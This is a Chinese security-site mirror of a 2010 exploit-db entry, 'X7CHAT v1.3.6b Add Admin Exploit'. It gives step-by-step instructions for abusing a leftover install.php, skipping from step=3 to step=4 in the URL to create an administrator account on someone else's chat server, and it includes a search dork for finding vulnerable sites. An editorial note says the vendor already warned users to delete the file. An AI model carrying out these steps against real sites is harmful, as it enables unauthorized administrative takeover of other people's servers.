首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
X7CHAT v1.3.6b Add Admin Exploit
来源:vfocus.net 作者: d4rk-h4ck3r 发布时间:2010-01-04  
#####################################################
# [+] Author : d4rk-h4ck3r
# [+] Email : tnst@w.cn
# [+] Site : www.vbspiders.com/vb
# [+] Team : Tunisian Security TeaM
# [+] Dork : powered by x7 chat 1.3.6b
#####################################################

##### Notes from the exploit-db.com team ############
# Vendor has already addressed this issue and even provided a solution in Docs/INSTALL.txt:
# "After finishing the online setup delete the file install.php.  If you do not it will be 
# possible for anyone to create an administrator account on your chat server."
# 
# Therefore please keep in mind this exploit is not guaranteed to work.
#####################################################



The exploit :
1- go http://site.com/script/X7Chat/install.php
2- Now you are in X7 Chat Install step 1 click continue
3- Now you are in X7 Chat Install step 2 click also continue
4- Now you are in X7 Chat Install step 3 .
 change url from http://site.com/script/x7chat/install.php?step=3 to http://site.com/script/x7chat/install.php?step=4
5- now add user name and password
6- Go login page http://site.com/script/X7Chat/index.php

Good luck and don't make something bad .


Greetz to Password & Maxilog .

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Left 4 Dead Stats 1.1 SQL Inje
·HLstats v1.35 XSS Vulnerabilit
·Wordpress Events Plugin SQL In
·Desteam Uploader XSS Vulnerabi
·Joomla Component com_dailymeal
·SLAED CMS v.2.0 ARABIC VERSION
·answer&question 1.0 Arabic ver
·SMSPages v1.0 Arabic Mobil Ver
·bandwidth meter v1.2 XSS Vulne
·PlayMeNow Malformed M3U Playli
·arab3 upload Cross Site Script
·WMNews Cross Site Scripting Vu
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved